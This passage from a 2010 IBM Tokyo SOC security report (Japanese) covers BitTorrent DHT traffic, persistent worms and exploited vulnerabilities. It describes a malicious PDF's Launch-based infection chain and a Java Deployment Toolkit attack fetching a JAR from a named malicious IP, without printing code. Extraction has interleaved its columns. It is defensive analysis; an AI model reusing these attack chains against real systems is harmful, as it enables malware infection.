ることが分かります。また、この送信元 IP アドレスと
EventCount
Uniq IP
2,000,000
1,800,000
1,600,000
1,400,000
1,200,000
1,000,000
800,000
600,000
400,000
200,000
0
250,000
EventCount
UniqSrcIP
UniqDstIP
200,000
150,000
100,000
50,000
2009/11/01
2009/11/08
2009/11/15
2009/11/22
2009/11/29
2009/12/06
2009/12/13
2009/12/20
2009/12/27
2010/01/03
2010/01/10
2010/01/17
2010/01/24
2010/01/31
2010/02/07
2010/02/14
2010/02/21
2010/02/28
2010/03/07
2010/03/14
2010/03/21
2010/03/28
2010/04/04
2010/04/11
2010/04/18
2010/04/25
2010/05/02
2010/05/09
2010/05/16
2010/05/23
2010/05/30
2010/06/06
2010/06/13
2010/06/20
2010/06/27
0
図 13 BitTorrent DHT イベント検知状況の推移
(東京 SOC 調べ:2009 年 11 月 1 日~2010 年 6 月 30 日)
16
2010 年上半期 Tokyo SOC 情報分析レポート
P2P 通信のアクティビティー
図 14 と図 15 は BitTorrent DHT 関連イベントをト
活確認の目的で行われる ping クエリーは、通常、長
ラフィックの向きとその内容で分類したものです。
期間 DHT ネットワークに接続していない IP アドレス
BitTorrent DHT では表 3 のように 4 種類のクエリー
にいきなり送信されることはなく、既に DHT ネット
が定義されていますが、2 月頃から急増しているイベ
ワークに接続された活性ノード間で相互に送受信され
ントは、その大部分をインバウンドの ping クエリー
るため、インバウンドのトラフィックに偏って ping
が占めています。
クエリーが急増することも不自然です。
通常の DHT ネットワークでは、本来の目的である
これは、東京 SOC が監視している企業環境の内部
共有ファイル情報のやり取りに使われる find_node
では DHT ノードがほとんど活動していないにもかか
や get_peers クエリーの通信が多く発生するため、こ
わらず、外部(インターネット)から、企業の所有す
のように ping クエリーが他のクエリーに比べて著し
る IP アドレスに対して DHT ping クエリーのトラフ
く多くを占める状態は不自然です。また、ノードの死
ィックが大量に送信されていることを示しています。
表 3 DHT で定義されているクエリーの種類
目的
ping
ノードの死活を調べる
find_node
特定の ID を保持している DHT ノードを探す
get_peers
特定の info_hash の peer を探す
announce_peer
ダウンロードしている torrent をアナウンスする
BitTorrent_DHT_Ping
BitTorrent_DHT_FindNode
BitTorrent_DHT_GetPeers
BitTorrent_DHT_AnnouncePeer
2009/11/01
2009/11/08
2009/11/15
2009/11/22
2009/11/29
2009/12/06
2009/12/13
2009/12/20
2009/12/27
2010/01/03
2010/01/10
2010/01/17
2010/01/24
2010/01/31
2010/02/07
2010/02/14
2010/02/21
2010/02/28
2010/03/07
2010/03/14
2010/03/21
2010/03/28
2010/04/04
2010/04/11
2010/04/18
2010/04/25
2010/05/02
2010/05/09
2010/05/16
2010/05/23
2010/05/30
2010/06/06
2010/06/13
2010/06/20
2010/06/27
1,800,000
1,600,000
1,400,000
1,200,000
1,000,000
800,000
600,000
400,000
200,000
0
クエリー
図 14 Outbound トラフィックにおける BitTorrent DHT 関連イベントの内訳
(東京 SOC 調べ:2009 年 11 月 1 日~2010 年 6 月 30 日)
BitTorrent_DHT_Ping
BitTorrent_DHT_FindNode
BitTorrent_DHT_GetPeers
BitTorrent_DHT_AnnouncePeer
2009/11/01
2009/11/08
2009/11/15
2009/11/22
2009/11/29
2009/12/06
2009/12/13
2009/12/20
2009/12/27
2010/01/03
2010/01/10
2010/01/17
2010/01/24
2010/01/31
2010/02/07
2010/02/14
2010/02/21
2010/02/28
2010/03/07
2010/03/14
2010/03/21
2010/03/28
2010/04/04
2010/04/11
2010/04/18
2010/04/25
2010/05/02
2010/05/09
2010/05/16
2010/05/23
2010/05/30
2010/06/06
2010/06/13
2010/06/20
2010/06/27
1,800,000
1,600,000
1,400,000
1,200,000
1,000,000
800,000
600,000
400,000
200,000
0
図 15 Inbound トラフィックにおける BitTorrent DHT 関連イベントの内訳
(東京 SOC 調べ:2009 年 11 月 1 日~2010 年 6 月 30 日)
17
2010 年上半期 Tokyo SOC 情報分析レポート
P2P 通信のアクティビティー
4.3 まとめ
DHT ping クエリーは 100 バイト程度の小さなパケ
ットですが、Firewall 機器などで外部からのトラフィ
検知情報のみから、この DHT トラフィック傾向の
原因を特定することはできませんが、DHT ping クエ
リーに偏ったトラフィック状況からは、送信元となっ
ている DHT ノードが、一般的な DHT ネットワークの
利用とは異なる動作を行っている可能性が伺えます。
このような DHT トラフィックの宛先となる環境に
は、非常に多くの DHT ノードから DHT ping クエリ
ー(UDP high port 宛)が送付されるため、ネットワ
ックを全て記録する設定を行っている場合には、ログ
の出力が飽和する可能性が考えられます。
現在のところ、この DHT トラフィックが DDoS な
どの攻撃を意図したものであることを示す情報はあり
ませんが、このようなトラフィックの急増に備え、ネ
ットワーク機器の設定や、リソース管理体制(障害の
検知や対応を含む)を定期的にレビューすることを推
奨します。
ーク機器に過度な負荷を生じる可能性があります。
18
2010 年上半期 Tokyo SOC 情報分析レポート
[Column2] 長期間活動するワーム
ワームのように短期間に爆発的に拡散する脅威は、その爆発的な挙動ゆえに検知されやすく、比較的短
期間で収束するように思われますが、実際には発生後長くインターネットを脅かし続けるものがあります。
図 16 は、今期の SQL Slammer ワームによる感染活動の検知状況です。このワームは 2003 年 1 月
に発生したワームで、Microsoft® SQL Server/MSDE 2000 の脆弱性(MS02-039)を悪用して拡散
します。発生当時は、攻撃パケットによってインターネット全体のトラフィックに負荷を与えるなど多大
な被害をもたらしました。同時期に発生した Blaster ワームなどは、現在その活動を捕捉することはあり
ませんが、この Slammer ワームは 2010 年に入ってからも連日 110 カ国以上から、その活動を示すト
ラフィックが検知されています。
また、2008 年後半から 2009 年前半にかけて猛威を振るった Conficker ワームも、最近感染ノード
の減少が止まりつつあり、活動の長期化が懸念されます(図 17)
。
300
検知IPアドレス総数
250
200
150
100
50
2010/06/29
2010/06/22
2010/06/15
2010/06/08
2010/06/01
2010/05/25
2010/05/18
2010/05/11
2010/05/04
2010/04/27
2010/04/20
2010/04/13
2010/04/06
2010/03/30
2010/03/23
2010/03/16
2010/03/09
2010/03/02
2010/02/23
2010/02/16
2010/02/09
2010/02/02
2010/01/26
2010/01/19
2010/01/12
2010/01/05
2009/12/29
2009/12/22
2009/12/15
2009/12/08
2009/12/01
0
図 16 SQL Slammer ワームの検知状況の推移(東京 SOC 調べ:2009 年 12 月 1 日~2010 年 6 月 30 日)
50,000
45,000
40,000
35,000
30,000
25,000
20,000
15,000
10,000
5,000
0
2010/06/01
2010/05/01
2010/04/01
2010/03/01
2010/02/01
2010/01/01
2009/12/01
2009/11/01
2009/10/01
2009/09/01
2009/08/01
2009/07/01
2009/06/01
2009/05/01
2009/04/01
検知IPアドレス総数
図 17 Conficker 感染ノードの検知状況の推移(東京 SOC 調べ:2009 年 4 月 1 日~2010 年 6 月 30 日)
ワームの根絶が難しい背景として、感染に気付かないユーザーの存在が挙げられます。このような問題
への対策には、アウトバウンド通信の検査を推奨します。通常、ワームは拡散するために大量の通信を行
うため、この通信の一部が外部ネットワークに向かった際に、アウトバウンドの通信ログに不自然な痕跡
を残します。また、ワームに限らず、最近の洗練されたマルウェアは、そのほとんどがインターネット上
のコントロール・サーバーとの通信を行います。そのため、アウトバウンド通信を監視することで、高度
なウィルスの挙動を検出できる場合があります。
19
2010 年上半期 Tokyo SOC 情報分析レポート
5 今期話題となった脆弱性
本章では、今期注目を集めた脆弱性について説明します。また Adobe Reader/Acrobat の脆弱性、
Java Deployment Toolkit の脆弱性について、それぞれ実際に検知した攻撃事例を解説し、対策を紹
介します。
5.1 今期注目を集めた脆弱性
ではなく限定した組織を狙っていたことから、注目を
集めました。
今期確認された脆弱性の中でも特に注目すべき脆弱
性として、修正パッチ公開前に攻撃が発生(ゼロデイ
攻撃)したもの、または脆弱性を実証するコードが公
開された脆弱性を表 4 に一覧しました。
今期は、Microsoft Internet Explorer に 2 件もゼロ
デイ脆弱性(CVE-2010-0249、CVE-2010-0806)
が公開されました。CVE-2010-0249 については、こ
の脆弱性を悪用した標的型攻撃を受けたことを
Google が 発 表 し た こ と で 話 題 と な り ま し た 。
Operation Aurora と名づけられたこの標的型攻撃は、
メールやインスタントメッセンジャーを経由して悪意
のある Web サイトへアクセスさせるという、1 章で解
説したドライブ・バイ・ダウンロード攻撃と同様の攻
撃手法を用いていました。しかし、悪用するクライア
ント PC の脆弱性が未知のもの(攻撃当時は脆弱性自
体が未公表)であったことと、攻撃を大規模に行うの
また、CVE-2010-0806 は、ドライブ・バイ・ダウ
ンロード攻撃ツールである CRIMEPACK(表 1 参照)
などにこの脆弱性を攻撃する機能が組み込まれたため、
大規模に悪用されました。東京 SOC でも、この脆弱
性を悪用する機能を組み込んだ CRIMEPACK からの
攻撃によってウィルス・ダウンロードの被害にあった
事例を確認しています。
そのほか、前期に引き続き Adobe Reader/Acrobat
の脆弱性が複数確認されています(CVE-2009-4324、
CVE-2010-1297 )。1 章でも 取り 上げ ました が、
CVE-2009-4324 は Gumblar.8080 攻撃でも悪用さ
れました。また、CVE-2010-1297 は、SPAM メール
を用いた攻撃11に悪用されたことを確認しています。
11
Tokyo SOC Report - Adobe Reader および Acrobat のゼロデ
イ脆弱性を悪用する SPAM メール
https://www.ibm.com/blogs/tokyo-soc/entry/adobe0day_spam_
20100622
表 4 今期話題となった主な脆弱性
日付
概要
脆弱性
2010年1月12日 2009年12月15日に確認されたAdobe ReaderおよびAcorobatの脆弱性を修正したバージョンが公開される
CVE-2009-4324
2010年1月12日 Google社が、Internet Explorerの脆弱性を悪用したゼロデイ攻撃(Operation Aurora)を受けたことを公開する
MS10-002
2010年2月26日 VBScriptの脆弱性により、リモートコードが実行させる問題に関する検証コード(PoC)が公開される
MS10-022
2010年3月10日 Internet Explorer における解放済みメモリを使用する脆弱性を悪用するゼロデイ攻撃が確認される
MS10-018
2010年3月29日 Adobe ReaderおよびAcorobatのLaunch機能を利用して攻撃を行う検証コード(PoC)が公開される
N/A
Java Deployment Toolkitの脆弱性を利用してリモートコードが実行させる問題に関する検証コード(PoC)が公開さ
CVE-2010-1423
れる
Windowsのヘルプとサポートセンターの脆弱性を利用してリモートコードが実行させる問題に関する検証コード
2010年6月9日
CVE-2010-1885
(PoC)が公開される
2010年6月10日 Adobe FlashおよびAdobe Reader・Acorobatに新たな脆弱性を悪用するゼロデイ攻撃が確認される
CVE-2010-1297
2010年4月9日
20
2010 年上半期 Tokyo SOC 情報分析レポート
今期話題となった脆弱性
以降では、Adobe Reader/Acrobat の Launch 機能
仕様に基づいて古くから存在する機能であり、実装の
お よ び Java Deployment Toolkit の 脆 弱 性
不手際などによる脆弱性ではありません。しかし、今
(CVE-2010-1423)を悪用した攻撃について、東京
期になってから、不正なコードの実行に悪用可能であ
SOC で検知した実際の攻撃事例を踏まえながら詳し
ることがセキュリティー研究者によって指摘されまし
く解説します。
た12。
東京 SOC では、実際にこの機能を悪用してウィル
5.2 Adobe Reader および
Acorobat の Launch 機能を
利用した攻撃
ス感染を試みる不正な PDF ファイル(doc.pdf)が添
付された SPAM メールを 4 月 27 日から 5 月 1 日にか
けて大量に検知しました(図 18)
。
添付された PDF ファイルを Adobe Reader で開く
と図 19 のようなダイアログが表示されます(Adobe
PDF ファイルには、ファイル閲覧時に外部プログラ
ムを実行する機能(Launch 機能)が存在します。こ
の機能を利用すると、例えば PDF ファイルを Adobe
Reader/Acrotab 9.3.2 および 8.2.2 以前)
。
12
Didier Stevens - Escape From PDF
http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
Reader で閲覧した際に、同時に「notepad.exe」プ
ログラムを起動させることが可能です。これは PDF の
25,000
攻撃検知件数
20,000
15,000
10,000
5,000
図 18 Adobe Reader および Acorobat の
2010/05/05
2010/05/04
2010/05/03
2010/05/02
2010/05/01
2010/04/30
2010/04/29
2010/04/28
2010/04/27
2010/04/26
2010/04/25
2010/04/24
0
図 19 doc.pdf 実行画面
Launch 機能を悪用した攻撃の検知件数の推移
21
2010 年上半期 Tokyo SOC 情報分析レポート
今期話題となった脆弱性
これは Launch 機能によって PDF ファイルから外部
図 20 は、PDF ファイル内に含まれていた Launch
プログラムを呼び出そうとしていることを表していま
機能から呼び出されるプログラムです。[開く]を選択
す。ここで、[開かない]を選択すればプラグラムは実
してプログラムが呼び出されると、2 つの VBScript
13
行されませんが 、[開く]を選択してしまうと、プロ
のファイルが作成されます。この PDF 内にはエンコー
グラムが実行されます。
ドされたウィルスが含まれており、作成された
他の Adobe Reader の脆弱性のように PDF ファイ
VBScript は PDF ファイル内からウィルスコードを抽
ルを開くだけでウィルスに感染することはありません
出して Windows 実行ファイルを作成し、PC に感染さ
が、今回の攻撃では、ユーザーに[開く]を押させるよ
せます(図 21)。
うに促す文字列をダイアログ内に表示させることで、
13
成功の成功率を高めようとしていました。
過去に同ダイアログで、[次回から表示しない]を選択して[開く]
押してしまっている場合は、PDF ファイルを開くだけでも影響を受
ける場合があります。
doc.pdf
Launchするコマンド
作成
script.vbs
(PDFファイルからウイルスを抜き出す)
作成
抽出
batscript.vbs
(エンコードされたウイルスファイルを
デコードしEXEファイルにする)
抽出
作成
実行
削除
game.exe
(ウイルスファイル)
エンコードされたウイルスファイル
図 20 PDF ファイルから呼び出されるコマンド
図 21 doc.pdf のウィルス感染までの流れ
22
2010 年上半期 Tokyo SOC 情報分析レポート
今期話題となった脆弱性
5.3 Java Deployment Toolkit の
脆弱性(CVE-2010-1423)
Java Deployment Toolkit とは、JRE 1.6.0 Update
10 以降に導入された機能で、クライアント PC 上の
JRE のバージョンを判定したり、同機能に対応する
Java アプリケーションをインストールしたりする機
能を提供します。
2010 年 4 月 9 日、この機能に存在する脆弱性を用
いてリモートから任意のコードを実行することが可能
であることを実証するコードが公開されました。
そして、4 月 15 日には、この脆弱性を悪用する攻
撃コードが Gumblar.8080 攻撃に組み込まれ、大規模
な攻撃が発生しました。
該当する Gumblar.8080 攻撃では、図 22 のような
攻撃コードが確認されました。この攻撃コードはサー
バー「87.110.220.31」に設置された「0923.jar」と
いうファイルを実行させるものです。
javaws.exe(Java Deployment Toolkit 機能を提供
する実行ファイル)は、リモートの JAR ファイルを実
行する際に、ファイルの取得を SMB(ネットワーク共
有)で行います。取得先のサーバーで SMB が有効に
なっていない場合は、WebDAV を利用してファイルを
受信します。
今回検知した Gumblar.8080 攻撃のサーバーでは、
SMB が有効になっていたため、攻撃成功時には SMB
によってファイルが受信されます。
この JAR ファイルには図 23 のようなコードが含ま
れています。これは、さらに別の EXE ファイル(ウィ
ルス)をダウンロードさせ、実行させる内容です。
図 22 Java Deployment Toolkit の脆弱性攻撃コードの一例
図 23 受信した JAR ファイル
23
2010 年上半期 Tokyo SOC 情報分析レポート
今期話題となった脆弱性
5.4 まとめ
が発生した場合は、防ぐことができない可能性があり
ます。
ここで取り上げた脆弱性の多くはすでに修正パッチ
や、脆弱性を修正した次のバージョンがリリースされ
ています。利用しているアプリケーションのバージョ
Launch 機能を利用する必要のない環境では、図 25
を参考に以下の手順で無効化しておくことをお勧めし
ます。
ン管理に少しでも懸念がある場合は、脆弱性が未修正
1. Adobe Reader を起動し、メニューから [編集]
のシステムを使用していないか再度確認されることを
-> [環境設定] を開く
強く推奨します14。
2. 信頼性管理マネージャをクリック
なお、Adobe Reader/Acrobat 9.3.3 および 8.2.3
3. "外部アプリケーションで PDF 以外の添付ファ
以降では、Launch 機能によって実行するプログラム
イルを開くことを許可" のチェックボックスを
が有害であるか判定する機能が加わっています。これ
外す
によって、Launch 機能を悪用する不正な PDF ファイ
4. [OK] ボタンをクリック
ルを表示した場合、図 24 のようなプログラム実行を
禁止するポップアップが表示されるように変更されて
います。しかし、Launch 機能を悪用する未知の攻撃
図 24 Adobe Reader9.3.3 にて Launch 機能を
14
IPA MyJVN バージョンチェッカ
http://jvndb.jvn.jp/apis/myjvn/#VCCHECK
図 25 Adobe Reader の Launch 機能を無効化させる画面
悪用する PDF ファイルを表示させる画面
24
2010 年上半期 Tokyo SOC 情報分析レポート
おわりに
2010 年 7 月 13 日に Microsoft Windows 2000
昨今、PC を安全に利用するために実施すべき項目
および XP SP2 のサポートが終了しました。これに対
が増え続けています。これは PC の使用目的や組織の
応するかのように、東京 SOC では 2010 年 6 月に、
事業規模とほとんど関係がありません。中小規模の企
Windows XP SP3以降のシステムのみを対象とする
業や、個人運営の Web サイトが大量に改ざんされド
ドライブ・バイ・ダウンロード攻撃を確認しました。
ライブ・バイ・ダウンロード攻撃に悪用されている現
一方で、現行の Windows OS と 2000 や XP SP2
状は、このような問題への対処の困難さを示している
以前のバージョンに共通する脆弱性も存在するため、
といえるでしょう。
現行の Windows OS を対象とする攻撃の多くは、引
き続き 2000 や XP SP2 以前のバージョンにも有効で
す。
IBM では、本レポートで紹介したような情報セキュ
リティーに対する脅威によってもたらされるリスクを
最近、Windows 2000 Server を更新するまでの脅
低減するための対策を、現実的な方法で実現する必要
威低減を目的として IPS を導入するケースが見受けら
があると考えています。そして、具体的なセキュリテ
れます。これは脆弱性を仮想的にパッチするという
ィー対策を導入から運用まで一貫して提供しています。
IPS の存在意義が存分に発揮されるケースといえるで
マネージド・セキュリティー・サービスでは、ネッ
しょう。
トワーク・レイヤーにおけるセキュリティー対策の運
しかし、脆弱性の性質やシステム環境によっては、
用サイクルを効率的に進めるための「MPS(マネージ
正式なパッチと同等の防御効果を得ることが難しい場
ド・プロテクション・サービス)」や、さらに導入しや
合もあります。上記のような目的で IPS を導入する場
すい価格の「MPS Lite」など、複数のサービス・ライ
合は、仕様上の制限や運用上の制約を十分に吟味し、
ンナップを揃えています。
あらかじめ、サーバーの更新時期を明確に設定してお
くことを推奨します。
®
これらのサービスでは、Proventia シリーズを利用
して、専門の技術者が 24 時間 365 日 監視/運用/
管理を行います。情報セキュリティーに関するリスク
昨年来ドライブ・バイ・ダウンロード攻撃が脅威の
中心となる状況が続いており、この傾向は当分続くも
のと考えられます。今期は特にゼロデイ脆弱性を対象
とする攻撃が多く行われ、被害が拡大しました。
を軽減させるための手段として利用をご検討いただけ
れば幸いです。
IBM は、社会的な基盤へと成長した情報システムを
守るため、高度化・多様化を続ける脅威に対して常に
ゼロデイ攻撃に対処するためには、日々情報セキュ
"Ahead of the Threat" を実現する製品とサービスを
リティーの脅威に関する情報を収集し、有効な緩和策
提供することで情報社会の発展を支援していきたいと
を検討し、それを実施していくことが欠かせません。
考えています。
【注意】本レポートで紹介した対策は、利用環境によって他のシステムへ影響を及ぼす恐れがあります。また、攻撃は日々変化しており、
必要となる対策もそれに応じて変化するため、記載内容の対策が、将来にわたって効果があるとは限りません。対策を行う際には十分
注意の上、自己責任で行ってください。なお、IBM はこれらの対策の効果を保証するものではありません。
25
2010 年上半期 Tokyo SOC 情報分析レポート
執筆者
大森 健史(エグゼクティブ・サマリー)
井上 博文(3 章)
梨和 久雄(4 章、コラム 2、おわりに)
朝長 秀誠(1 章、5 章、コラム 1)
窪田 豪史(2 章、コラム 2)
2010 年8月2日 発行
日本アイ・ビー・エム株式会社
GTS 事業 ITS 事業部
マネージド・セキュリティー・サービス
セキュリティー・オペレーション・センター
© Copyright IBM Japan, Ltd. 2010
IBM、IBM ロゴ、ibm.com および Ahead of the Threat、Proventia は、世界の多くの国で登録さ
れた International Business Machines Corporation の商標です。他の製品名およびサービス名等は、
それぞれ IBM または各社の商標である場合があります。現時点での IBM の商標リストについては、
www.ibm.com/legal/copytrade.shtml をご覧ください。
Adobe は、Adobe Systems Incorporated の米国およびその他の国における登録商標または商標で
す。
Microsoft および Windows は Microsoft Corporation の米国およびその他の国における商標です。
Java は Sun Microsystems, Inc.の米国およびその他の国における商標です。
●このレポートの情報は 2010 年 7 月時点のものです。内容は事前の予告なしに変更する場合があ
ります。
26
2010 年上半期 Tokyo SOC 情報分析レポート